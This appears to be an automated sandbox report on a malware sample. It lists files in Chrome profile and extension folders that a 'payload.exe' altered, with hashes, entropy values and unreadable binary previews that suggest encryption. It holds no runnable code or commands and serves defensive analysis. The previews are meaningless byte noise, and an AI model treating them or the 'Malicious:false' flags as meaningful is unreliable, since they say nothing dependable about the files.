                                                                                                      SHA1:F64EDB7C1E3FE99EBEF440D67447065539A8BC9A
                                                                                                      SHA-256:4C0898315A99461E9A994DCB175FF5EA554F9F0092DDFD733DF3C5567071F3C8
                                                                                                      SHA-512:178F339CE896C915B13DB8C07571B3990134EC6D49D376B8DA1F8B6669E6AD388AF389A3C9FBD388E4C868B1DDE60B7030303CB5482B9486185DA75D7583C847
                                                                                                      Malicious:false
                                                                                                      Preview:.....Xze. ~gP.#$....].....u.|..;4....A.9..2tx)...y4..):...c..@.).,&..7.|X<..N...G5.......aK#.....5.~.(.....f..!...^!YJ.maV`..........r.uG....[.8....]..d$.#~.d.....-.i.c..b. o".0. C..J....V.U...K.u.wp.qsI..y...2P.X.eO...%....([..Z{fs.....:GX....!......T.}..u*%..u.......>.?}..9.q.ZE$....q.l'...v..+qA...D.%....+....g`.Y..k...8..TF[...J..%.%U...'..3.LL.c.F.&....tPN...!....p..R..2|.Hx.......8t....{.......5o..5..kf...Y.[..g. &/S.B..O...HQ.nu..c.b.K;.w..aJ6.S...=.eK....0.....H....~...8....k".o...\..2.xQ.k..n^.:.Z)O..6..z.!Q.F...e.<`..........u.Iyx.=.....j.t..c.-.E3....a...Y].1..U.b..o&4.4_l.g...<S.V..G.z?."..E.......v.4+.....TN..l>.Ui>MI.....(...X...T............z..@.M}aSs|........f.....f..h..f....^....b.'c:...8....,;.....d^]..'_.}...7.8..]........+m.....E...\....(9.,.^..?g..M...a+.##3....S~...kMSq.D...HH...o.D(l..M...t.9....O*...7..D3..y.7.......ND.,f...P....t3...~....}.T.J..A.....5.^.#....Tt.Q.N.....D+..j....y......r/........v+..~...

                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5767502
                                                                                                      Entropy (8bit):0.7568165707626029
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:orBJ9G9nynEXXqOM6H6hpXOOQ40BTlZVSa+d+gOrOuWxWk3m+cun4CfYjUfSUXiE:orlmn1XUaJJ4+3iR3b0a
                                                                                                      MD5:FE224EC3C8735E75F1A2050520B3AE58
                                                                                                      SHA1:EDA1708E4CE9D9A6F1DB778647A1F4CAC5A96956
                                                                                                      SHA-256:21F8B67341F8CBC309F3FE356992999DCA542A96AD56A77875A2DCC437904B83
                                                                                                      SHA-512:99C0190E15E8C857A919660B985AA2172E06DF4C3A74ADB1A326BF651083C5443E4EF4179180A2344A437B98126FDDC20BFD9ECB166FC505595A1CFADA030A9A
                                                                                                      Malicious:false
                                                                                                      Preview:....'..z....H...;h...<.F$..........&.......n....~.x.9......&e.!....?..N.8.52....5cl.."<..!....P!.n.hE. ..e5<.......I.V...o.....(I.\-.x..<.6...S.H..K....@-E....$..............W.M...A_8........,OE..yj.jx.v..y3.RDh.}z.`....3.x{fw..PA....B.!.;....=.$..D...F..):.EA..x.#.uU..3..A..<...j.oN.o.(...Ix....&k.^A....1.8...Fi.6.|..$.......V......-.(........)b.r.f...C...-..h).."+.#A.v.-...`.A.c..@...~/z.r..!..4=..*.........AOZ....n;.%.N....7@.}...!...........c...m...:. .n..I5..6&.......;.[<).....V..-....fe..]........@9..Y.^o..@F.f.Y.....V.jSd..i.#.....D#..b].zy...@.....g.?.C..*zm04. U*..Jy.9u..5..u_.*...]./jMB[.b*q..<(X.|V^d...IwF......D..pR~i=]..PZ.....k......=.!E..n.2...Z.......|..m.....u..8..^/ij50yP.('...%. g..:...,...dX.z..YN....#......K....(...;..Bq......5LT..,_.........EI......3.....@Wf'.x._O...K...Mc.O.[..D\y.N.2.C.>.V.N&...Py^g=......0b..Q..l.#{p..h.Gy....F3\...R...?.~...R)..G..F=..*.?*85..?h.{..r.z......,...>].'._A....(b..c.T.C.R..%3}.%+

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):486
                                                                                                      Entropy (8bit):7.519285976135864
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:q7FUfySjJy1P67rjHstMxpvAehLfAwofSltwODv6cii9a:8Ft+Jy1P6zHVpv7hTAzYmODv6bD
                                                                                                      MD5:7045F28F9ADCE6EA5E3536E360B72C35
                                                                                                      SHA1:CDC78666BB62C0A1B4E443FA2B1B53552FBE8758
                                                                                                      SHA-256:597FA2E9D53E5A3A9C5D4B567C3EEC5ACB166E709D1045726EBD88B2AE46D227
                                                                                                      SHA-512:953987B074BAF65FE679637D7DC5B089ECDAC7E5AFCF10A634FBF7C5E29A33676F9FF07BCB8B3FCAF5164357E822BC9C8493CE6F002277537E571C13E51B26E9
                                                                                                      Malicious:false
                                                                                                      Preview:.f.5....B..8~.N.....E .c..=..}`q....>x_.q..y.KM.A.$).../.=.u.F..8G.G..f.'.F..6.....t.H.i......y.{....=~r.f24.s...ht.:r.=.1.d..QJ.i`.K.....!....~F.c.z.r@..>..d...ixSY....G...^.{d.......,.;.".T.=..9....eKl.P.v.y.;..c..0u..V.......&<..Q.t#;.....N'.|..R>T^WO.....M...F..o8ZX.....#....8...3?9.Z>.Z.......Z~.t.\......I.....I2..!..+.3.k2Z.. ...`...N.+..'......{6Z..j+..".@0.Z...d.Z.q[....l{]|..-.S'hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):486
                                                                                                      Entropy (8bit):7.505167327888126
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:qfvcsLQQE1DNH8J5Y88Vnx5+AQWEaJeYDSMJI2qM5gRdv6cii9a:N1DOJGv+AQWEaDSMJI2gRdv6bD
                                                                                                      MD5:CA8FD6B97A8410BE75D0DE2EB9501347
                                                                                                      SHA1:70550F220400F6BE66B584C9F5AB6406865A852B
                                                                                                      SHA-256:07B8AE79A2FBCB3BD2EB900D5874582AD2742095B3A09CAA27BBECFE5380F470
                                                                                                      SHA-512:9AAFA4A539CE8C6C7DE47262C56A663A630D5A3973640C290E4E7628D2926FDB3B7C82AC365DC41FEB91BA770EC579AF28F1F4888A60F15CBB135CE8868B9E15
                                                                                                      Malicious:false
                                                                                                      Preview:.f.5...u.xk(~.)8...Q.P.j..y.U..42.E!.M....E..D......>.y1K/nT.7../W...zm..).(...|.>.....:J.D..;...R8%|......."....%8!.I7B...Y.i..P.....I.#.?\.~3..+.q...G..u...._.:0/..n.. .......R.:....6d0.."....W:....._.Z.3'....=l...a....T.....2Z.*P..y.b.......x|..yY..9#.K.Q.6./C.}*..,%......]{...x.....e.U...#........#.}f(S..3..p.W..q.M=...J@.\..M...a9...........H...~.....u....$w.....1V....?G..#...o..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):790
                                                                                                      Entropy (8bit):7.725055131026049
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:qzVImYFkpEZbghvGgcCkU5SgyvGFiSEajOtIPTIXQ9Tdq7Q7Uh7ujCz/HJv6ciik:6bY1xivZgJtIUA3T7Bm/pv6bD
                                                                                                      MD5:DFCB98953E1DCF5D6F28E0ECFE3FB6F0
                                                                                                      SHA1:6F176050B9E90934406C8424329D154E66874AF9
                                                                                                      SHA-256:4B849609DBD2CC59E7B5A60AC7D2F232331B806E9D401430C9B4EA1A249295FB
                                                                                                      SHA-512:42171953C03DC8DF0E8B69174006AB70D1567F0698FB1CE232BA1EE067CE190462114160BC4845772E7928DEA7717857E78430202E5A59D8CF317ED7481AD691
                                                                                                      Malicious:false
                                                                                                      Preview:.f.5.plR).I.....X..yM.........Y..p$'TC.z.#}..p...b,O.?.vg.V....(.D...q'....U]".t.L.zJ......5.c..} ..;.N..9.............+n.w...mL..O..W.g.}.q..$........d.!..6...@2.....eV..=. A....Q..(......mg..5.C.V...|.....h.-Ec.l..-~./...r.Z7.}.....5....P.B84..C.t~N..].l.?;Vk."w*.z.....GY....2.jd,b...Gq!...{.kr0....Iy./f..2.%O.GL.]4.%.^!.!].r..8.r.....B....&....?.1..?Ab...yq4|/.7..xD...2f\0.o.D....@..d..H..6C.a...t....^8.,~..n..q.....h.r...-.....qG..IGz.i...9.......}l..|Z....H|....,....T.u..X..6..d....e........1o....^.|.....S./vF.&..*I....GT...k......L+...7..:...X.SS...vi....[.P..:.F.[Jo..o.d3]....e`....\./...T.].....b%...p..0.:....O-...P..X.....k`.2......d......-....N.<hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):654
                                                                                                      Entropy (8bit):7.626907420971026
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:kXUmCVo/4VnRjg1HTZKntnACsWb/k80tHBvJBjiHZEj361v6cii9a:7Vo/AxgZT6ngR8wXjrj361v6bD
                                                                                                      MD5:F9BFB538584D0ACC0333D5715FB33053
                                                                                                      SHA1:540282292374D625D9A1EFC8A6F8016F41FE4C74
                                                                                                      SHA-256:924D6266324B5B05FB88AC0E770009DB7149CC96D869900ADD4667B01E8FB93A
                                                                                                      SHA-512:ACCE755D1872F7E2B3BE069630101BB847803CE6C0E65F4EF187785C72157378AB56F97D20841F355A06BB4F8164E29A440287E08529C857B1B734B3DEB7F6FB
                                                                                                      Malicious:false
                                                                                                      Preview:2023/0fx6YW._F..Q.U....=#.=.~..5./.....j..3.-.]..@8q.....QL..../.h....u..p.=............'{.g.r....8"S.ATT...}..' u..nj.K...*....$;....`)bz.r........0.z.B..A.X+..va...&.%..).9.....Y9.|..,..sn.y.?9.5.W...eL PA.C.....`.{....k....j.Z.<......3.@.#.*&a.a.:Y-.*....2#F....G.."..!..lU.k...'...b.bu..T....{.i=5.....^.&-.'.........6.c....`.i.'..a....o.W...xu...2).6..m=._. ..@..WvQ...M..t....O'P+.1.....5..U...}.-.^.c.n.c>.7K....... ..|p~.....h.q....a..r.B...'.S.ifD?.......'ac..|.$\...d>...90.$I..D.....BK...G...^\..I..*..A...]q.-*;...W.W..fx!.,.....%.u..VU,y.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\messages.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):965
                                                                                                      Entropy (8bit):7.766159352489436
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pvvseK6Ej27KaSqXMj6vEss6pQrS1sn17SPAd9+dY27yNXO0J1v6bD:xvseK6c2VSAl06pQm1s176AnArWeKwD
                                                                                                      MD5:A61161F5B69250EF674025B4189145FE
                                                                                                      SHA1:824879EE3E450B8B57B7BFD82BF28D90C31D1919
                                                                                                      SHA-256:C11329C5B6B4389B7F15000C548769FF4F9A134270D2FD255002E9BDBF426CC8
                                                                                                      SHA-512:5823E47A001DB4907DE409DB768528A317ABC3CEE3CFEC67278C878B400ABE0938B47492A007A8AC8BD9358B01B7E9709D98B06CF0915FC50C419564299EC19B
                                                                                                      Malicious:false
                                                                                                      Preview:{.. ...e..tD.z/._...Rt6N.kqx.[/wu....AC...r..E.xLJ:NJ7Br...0$y._.M..m........`c..1.v..i.SS.n..9.$..............p....`..P/.p.QR*A_.q"...]G mo`...0..Ni....GN_...t...w.#.<.Z.t5"v.A.9...RNP..?..\...*Q.v.......-...Lb.T.d...R..2..F.e..60....3...^.KZ(d.n6...S..v.Y..M...."<!.."V....H.].mZ.:....r.....R..`..p....9.....%..#h.Be...^..e....n..:..}3.....=.y..Z.x........._.T^....(QG.f.#(g.......)D+...fVZ<.}.S..Q.._..4.O../U...g~...}..(....YB.r.C..e.X.M=...dD.5;Ue ...rY...|..ml.s....ZVM.w..B.Y=.,.x.Q.nh9J..k@.S.&.,.hW....t.Byr......}....V.lsg.]>..owI....|..jE.xx.H.0....#Y._..,|...uQi%.iZ~4.li..+I.........r...V..e......."...B...(q..Jd9....$?.'a.Bz.E.!.-...).!.yg?F.;..........:2WS.L..D.\_3.nwG...2Y.K.....G....!-...D^........W.?c-L*2E......bY..|.......~......'Y...]......%.~.2...*....V..&...$x.7e...EQ..7w....$=.qV.'...La.$.].Q......U,.Cv..v..m.s...G.!%(.S:9hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\messages.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1054
                                                                                                      Entropy (8bit):7.788332924521555
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:shNgca+DOSXjp4VGAMcStYRfCrXrXv+WA8tU4EY/nv6bD:as+DVm3QtMc/+z8t9vwD
                                                                                                      MD5:FD3694AF3F656C9C439DAE68ED38815D
                                                                                                      SHA1:CEF44758DABC4123258CC9E0C189C9FAE64E0F9A
                                                                                                      SHA-256:DAD5A960CC2D004D42EB2FF228F8C4C22659708A5180ED2D792BFE47DEC139D2
                                                                                                      SHA-512:DB6E1F4C6356D4E6DF497F28C416D0882F4A2ECF998133400AD363E5AE9B982E8417CFE69D39E7EAFDBA73B4447B2AEF1460766352F952ACC0FC151D1EE9A8E3
                                                                                                      Malicious:false
                                                                                                      Preview:{.. [V*.}..F(/....@....kX.6.M..t.. L...W...2@.j....f..%....m* .,.....99}?.....B..<.g...{3.y.c9.e8.z....k.F||J.,....}....8.zy....@]v.+a!._.....q0u.....).T..t .......g3...O.......e....8*..N.(`..R.3...`n4L^. w...+...@...y....9k...O{V.oyx.0Z/..W...'>]..w>.....m..E...1.:zr.....x...h.|.+0..<.(..B4....$........l..'.L3.DYJ,,...B....YD7.....c{3!.~1.).b..{..S.zR....[Y$.w.v1...R....Ft....84..c.$.......q....]?.9A^N..@".@..........j...~.QY..J..~..).#".F..T.y..V./.Y..V..r..>.w....`.#.f.&....u.i..$....}.-.6v.. vA.7..4..-Z.S4...*;.P...X,F...g..*....y.......SX@..JC..X.A$i............J..{..k.A../.).G-..~.....8}./.f.tJ....E..~{*....F............$iZ."1+e|C......Y..N....M.-..b..!v..Uy...H.(f.....)..?...1..DTK/7.R....H..2?....hM.}S.1@.QRG).t....z.<PX.1....(..X.]....."o...w.....z.....2.3c.X.r-i...t/-.>%T...7.X...P.2..%c..8.GZ.......ip.K..W..8@....?..\....]..F..._.-...).........t..."....H.8.A.....A..3v0s<I....*......9G!^1.Y...-H*hZRMDGn2o1XdryxaQbOJI60E

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\messages.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1029
                                                                                                      Entropy (8bit):7.820361128239097
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mvgj51nqQB/ziecr41TPDd4EUQb5j+L07u4ZZLuTIHIdhQ3vValJsv6bD:mvWQQB/zjC0iQbt+L4JIE9EJswD
                                                                                                      MD5:BC1C1FC0DB0F2C99AD6B43462A1161EF
                                                                                                      SHA1:36A5C31E5299D571BD303179117A60E65491DCD7
                                                                                                      SHA-256:9B88D11A683243E5082572B58739032A0B12A89759B1B54BF117B4C5E30E2EEB
                                                                                                      SHA-512:8BE0E809F34E2D07FC1E94B88EF203B581D7DF231C5E2D97FA556AD84005A69047AFE0A2299A2578966F4D1D3840B03F1E4F881649A557C5B230C37EDDD691AC
                                                                                                      Malicious:false
                                                                                                      Preview:{.. >9.g.i:N.X......#*.......O....8.$a..c0...,.r..bN..!.....L.M\...S....&...q..6=c$Nq...].....i...M.;{.)b.O..A._...W....H#H..-.C"../$D.k.F^.K..:> ~..-..G..6...=.....z.P.a4...}m..mts.:.:....."o.|..j....*./.g.....O.....>..i.=V.k.A(d...=.;.#.T........j..#gPE'....:....p&."...j.'...... R.{.4....E.._...j.Ky.........wS}._.|a.d.a..c=K45...@$.O>......V....?=..6.@.X.,....."............+*...<.....a..2...Q..&._.)..L2...hg.!...v...qU..t..0)..'ER(..Ul.k.@'l...._..T..}...z...y.,:..6p..W...6..._.>..[.R...p....9P..r.r.......W..ar....rx5%......=...!Yf:k..+.K.../...g...'~..7...mN.W.q.#5.E@..i`.Q"..CB..T..J..Eo|.4......GyP@F..Vvz......a.\3..`...y.p.C.;.'D.2...atc.E.p...`._.;....(.n.E.g.6.......F4...f,k...........=K....,.....E..J...?.........y.B..X^j.{3.U...#B..b....O...F..o.N-&7IE+....m.`...wu.Q.gD&7PlI...#............H..Hn........chw(..!J mS.k.=pt.?q.C k..Q....d......'.])..y.5un>.C....[.....'.$...qhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\messages.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):929
                                                                                                      Entropy (8bit):7.7661481819491165
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:vrWLZEcKVEWT1PZ+nSlvEkADjsTQIIQPRQEKv6bD:idEc1WTdwE8GIObKwD
                                                                                                      MD5:E3F3B906D562EA355CB2CF679066C867
                                                                                                      SHA1:5DB9B96CCB31DF08B2D4B166B247743BF552CB92
                                                                                                      SHA-256:57FEE0DC47BD7EE116EA0ECA62CD969886C0778BB552274C243C6010CD971FE1
                                                                                                      SHA-512:E9B104250E065FB1688AC671C87EDAED3311DB5EF0F22BB40CF276B5AED539457F8C074D0BA2895804B7564C39D254832C8A72D819CE7968CE04C928BB71EA6E
                                                                                                      Malicious:false
                                                                                                      Preview:{.. C..V.):..$.5{....Z=..7~.(..*....(.rO3.M....f#.o..& +..l..s...z..#....!..+eN..9.B8.K.0.............Q..g../....3..w.pC....j"hx.S.H ?v....<.k.a..u..!(.....W.'......O.:.s......o%....Gz..6.e.....K..3hW...9...;4.S...9.nq*....$.IEl!7../.......*'.#$...0..Hf.>......|..}H........[EP. ...{......=..z..)"...}...G..l.X...R.T.zsO...'n4.....,s.r.}.x.s..4V.R.E........;3D.~h.oY^.....Q.6<x../..;`.n.9\......E.%;?L.u.z<&...v+~<l.W.....1....EP.X..e2..5.f.._c...s......I.....y.....!w.sV..-...C...E....5{x.(@H.|6.i"}..j..xi.}...P.....V[%..p.t.aX..\....Q....J..a....d'.-.`.c......h.:..U6$$.........i.....]..../........-.|r.1._.X......."*'e....2..'.n..............rJ9BYm<..g.l@9{|1Ff....@%..E.$.#.L.C!....)Z.....(.R.cP.!..$.....~3.=.I.6y.h8B1{-W.E.N.^..b...(.0.0vc=-EX...b3.......;.&T...&. .K.}.0..sc...t.....?.9.Cm..R.&.Rn.:hMz#.X...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\messages.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):968
                                                                                                      Entropy (8bit):7.77172666063877
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OcSXaZ+cpwnZ9TKmlrTzSiExLBETJJKAZxlsJKiv6bD:OraQHZ7TaLBETJJKiYKiwD
                                                                                                      MD5:C30695E2D5D47B10855F3D6798759B7B
                                                                                                      SHA1:31C78FC52A8A7D7C9BD1D8F9302C4086B1310172
                                                                                                      SHA-256:74D890864C89C567F9569A05F7C050CD122011B8CD07D2D633D5021ED149EAD1
                                                                                                      SHA-512:2521E0E3D8AD2F06148F7A9F4EAA185E20F40B03E6FE2CA4DD34FDCB9AA159E5C18EE338D07533CF74BACA6947620DC9F1B58191F6576F6EDAECF83F0C8D0F9C
                                                                                                      Malicious:false
                                                                                                      Preview:{.. ...;.........cSD_K....)\...r....._...z7jeO......c.|..@@.|..n..f.'..U.s..n.S.aB..P..B..O.Z.e..Eo.......WyL..Ff..."..m.../....o......PT.g8.o....o.O_ .....(V.H...fQV+|CO.p;.e....l}.9nkV.$*.A.....2.?.l.U...5....-.%P.._....;=r...{..W....o..(....#?.t.<V.~..:##9.Lte...].l.[.:....}........fPR%.5;.........q..6..W...;p..;$8..$...T.o\.nf...R*..P...;:..`..O.v....^..b....!.9.&.KM{.G...=V.(..u.-k....rV...,!+....6=...>f.y|."...'G8../..)O.?-...<...T+.N.....7?W....ps....d(.It.}.ENV.KLm/.t...r..)!....o..u!..m:.D.~.&{5xDk.N.;..58."..s,.......=k.=.O<.R.kg...[...Y.I...b[b...i...,D..t..U..C...$.dXa...&Q.....p.S...3."J....)_0.BE.Gv..._|...S...{8..9....S.._r..T.6$C..{s8..0.t4Kv..3v.f....s..(...+|%...O..'...........g..=..~HY.DM4~..>.z.....0.Mg...8}l......2u../...0..Q.x.v..!y......R~<...Z..3.*..E.x......w.\.....%=..?.6m9~......7..9;..>..W.V......(.-.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2713
                                                                                                      Entropy (8bit):7.9244871813838875
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:dNUQFWHpL1Ia/BwUODp22VQlwukqHZYzvq88HSS8Ngx9CUlX8bVE/uKp9Y6wD:IQMR0N2xwukqHZYzynH7llX8+uK4v
                                                                                                      MD5:53C4AF2DF1D007DEFDAA91AEA32918DB
                                                                                                      SHA1:1B7FB009ABC4862AE2C8833B2D60A8B25E1CEFF7
                                                                                                      SHA-256:1A5C38092251D8AC84276FABAB95FA0E14444685F707B07D8C56A5F031F63109
                                                                                                      SHA-512:2C14C00546489CA713184D228BB79A5F51609FC9965233B5A7C2513CCC1C972212BAB1BC5E75433E528B76DF13BB49B24257210C8D01FB2221AEFC5780668ADF
                                                                                                      Malicious:false
                                                                                                      Preview:*...#.....G9...../..)..fiKM..s(..5M.K)2......7n..;..m....t..m...Ap.Q.r......=..%.'^.;OPDfH.T....N....[}O{....(..@.....5m.|E..{..H...] ..g..[..6.\?.[..L..XC..xc..HH.l. O<....O446.!.h.RQP.,....n....g........j.t..H.......-.....rp.....O....l....#._.`..;H.Q....cX.&.`.\...-$.....q....Un..d.g.....L...C5d....Z.y{..L..I..!l....!&.g..#B.....!.......s...r...&P1..P..ZV..a..Q..B..9......x4..(.Ptq>......|9i...2.^.? K.UA...%..E..u..bE.43.....47.0 .|.5'.H0&.\x......>.&'.....Z.N..U...!.xV}....I<(..Y-....T...._.G..+.u.._.)..*b..D......L'..'....C.|..Ol[...YLJY....z.+....l......>.AAj9.r/.....a9-y...K<.-.M.....!...r.<..}IBkO=..[n.i?{...."!./...<...9..y..k..|-..9.N...P..K.*B.+.j.T.D.#..ri..`......P&u......'At./......M...j.....y.....o...R.V.......'!...,.t..g.C...n.......k.+...4.].8..o<..s".USA..cM....l@]...bPr....F.N[.y.uo...a...X.8.j.....bd.t'.X.+.F.q(....g.f.R..^W...m.fb...|0..T... `..-..y.7.$..x8....se~..P)t....X._.eK...9....U|.....'*.A..PG.[%..e.V<{.l

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):654
                                                                                                      Entropy (8bit):7.633423308622789
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:kSMpbKEVDz0BdHJrU5HhqqNVfhvA9ByL8rR2o0SjNhNO6bnHz0dqRiGNpnv6ciik:yWEVDz0BrrEhTNrI6L6jNhNO6bT0SzDs
                                                                                                      MD5:2001CF89D0B7262EBE38E0C81ADA17A0
                                                                                                      SHA1:ED7088AF3AD3F836FD2185F7D54BB1C8F2D9E94E
                                                                                                      SHA-256:FF9D6EF3DA875351E7F511C2C43AC190DCCB322D428A5EF3D99B4F45C034D8E4
                                                                                                      SHA-512:B4C95172A75AD0A23886B30584050D7CA449D72449365293A157FF66E0598BB0DDD2122C62721D8706734FB556324F23F266083D3704A19116E007D6AFB3768E
                                                                                                      Malicious:false
                                                                                                      Preview:2023/%...Y..............~u.P..x=....0.L....d}.$...O,7........%..r.....}v.d0....+g.>....g.E~u....n.W.=..R..ak....&..SB.`..n...0"..,........B..Be........JF..g,.O.=.&i...w..e....0.C..P|..B....t.a.d.@.OtG!.g....q..VK.....v..).;...yn.#F.%.I^.H.)."..\...2*/..2.|..l.D../...e(#}.%...#"...\...X...#......lD..NVR..5..Wr.u;a......m.._B....<?=V.G.:j.G.......&...[-.c.7Qt.l.97P.N.B..w[1..a..e+p.Z'.g...[9>......LM.....gET..+...Pe.OVv.\..b*$....K.e.N...q+.u..t.3.B.!...<$...Td..}..)T....p..A.t.%..!.\.."..<.>...ZQ|. .o.....q.Q.E.D....%^.Y.."..5B..............z..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):446
                                                                                                      Entropy (8bit):7.408340345754993
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MgVCxulsoAGFlxumHCQ9MfE18+8dTv6cii9a:bYGs+XxumP9eE6+8dTv6bD
                                                                                                      MD5:D7DE6A4FC973202FAB39104BD24F44F7
                                                                                                      SHA1:7E49BA49A75B8558407C50A552ACE9E1227DFDE0
                                                                                                      SHA-256:790D262BB57B5ECF6A4D7109EC0EB85A541426D8E3212F98E0CE05F5B760DAF3
                                                                                                      SHA-512:624F5085A2CAC47F790017A6748D23B3ADE86383139360C5D1A9E0E81F151966CBE4B3D07558192DA85102811E8BCA0823EA102859388942336EA140E2816566
                                                                                                      Malicious:false
